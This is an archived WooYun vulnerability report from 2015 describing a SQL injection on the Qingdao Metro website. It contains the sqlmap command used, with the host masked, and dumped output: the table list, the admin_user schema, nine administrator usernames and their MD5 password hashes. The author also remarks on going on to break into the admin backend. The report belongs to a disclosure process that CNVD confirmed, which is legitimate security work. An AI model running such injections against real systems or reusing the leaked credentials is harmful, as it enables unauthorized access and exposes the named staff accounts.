当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138039

漏洞标题:青岛地铁SQL(POST)注射漏洞/管理账号密码爆出

相关厂商:青岛地铁

漏洞作者: 冷白开。

提交时间:2015-09-02 15:36

修复时间:2015-10-20 08:36

公开时间:2015-10-20 08:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-05: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-15: 细节向核心白帽子及相关领域专家公开
2015-09-25: 细节向普通白帽子公开
2015-10-05: 细节向实习白帽子公开
2015-10-20: 细节向公众公开

简要描述:

青岛地铁SQL(POST)注射漏洞/管理账号密码爆出

详细说明:

注射命令:sqlmap.py -u "http://**.**.**.**/index.php/search" --data "keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97..." --dbs

简单明了的数据库

1.png

脱出数据证明危害

available databases [2]:
[*] information_schema
[*] new-metro
Database: new-metro
[51 tables]
+-----------------------+
| language |
| user |
| ad |
| admin_action |
| admin_config |
| admin_config_contrast |
| admin_role |
| admin_user |
| article |
| article_class |
| banner |
| basic_class |
| basic_info |
| brand |
| comments |
| dictionary |
| favorit |
| flink |
| func |
| invite |
| invite_class |
| line |
| line_altradions |
| line_facility |
| line_poin |
| line_shop |
| navigator |
| picture |
| picture_ |
| picture_class |
| picture_class_ |
| picture_info |
| picture_info_ |
| quest_class |
| quest_class2 |
| questionnaire1 |
| questionnaire2 |
| questionnaire3 |
| questionnaire4 |
| questionnaire5 |
| questionnaire_answer |
| region |
| search_word |
| smpt_num |
| test |
| user_f |
| user_form |
| user_form_middle |
| video |
| web_manage |
| widgets |
+-----------------------+
Database: new-metro
Table: admin_user
[8 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| level | int(4) |
| addtime | int(10) |
| ip | varchar(20) |
| is_delete | enum('0','1') |
| loginname | varchar(50) |
| pwd | varchar(50) |
| user_id | int(4) |
| username | varchar(50) |
+-----------+---------------+
Database: new-metro
Table: admin_user
[9 entries]
+----------------+
| username |
+----------------+
| admin |
| ceshi |
| jiangyongsheng |
| juzhiqiang |
| longyi |
| useryunying |
| wanghui |
| zhaogongzuo |
| zhenghongye |
+----------------+
Database: new-metro
Table: admin_user
[9 entries]
+----------------------------------+
| pwd |
+----------------------------------+
| 1da4da350c3433e678588f02e53bce30 |
| 50456aa3ad91184b86f4982060208ef9 |
| 51abe84a4da89e9beffae3713640f62c |
| 6869917cfcfdacec08fc0cb572fcda8d |
| 6901c829e8129994471b4e286c854de2 |
| adb49da3649260d111f8a54fbebbe3fa |
| aeae9a71330adf195a3366c27106633f |
| aff4537defd00c8e72c9ae1c9e8e11ff |
| b63019710800d5c1dedf7bbd52d5aa56 |
+----------------------------------+

正宗注入一枚啊,就是屌丝我木有MD5账号,解不了admin的密码,但是这不是问题啊,下一步就可以进后台各种猥琐了,青岛地铁系统啊,危害还是很大的

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-05 08:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无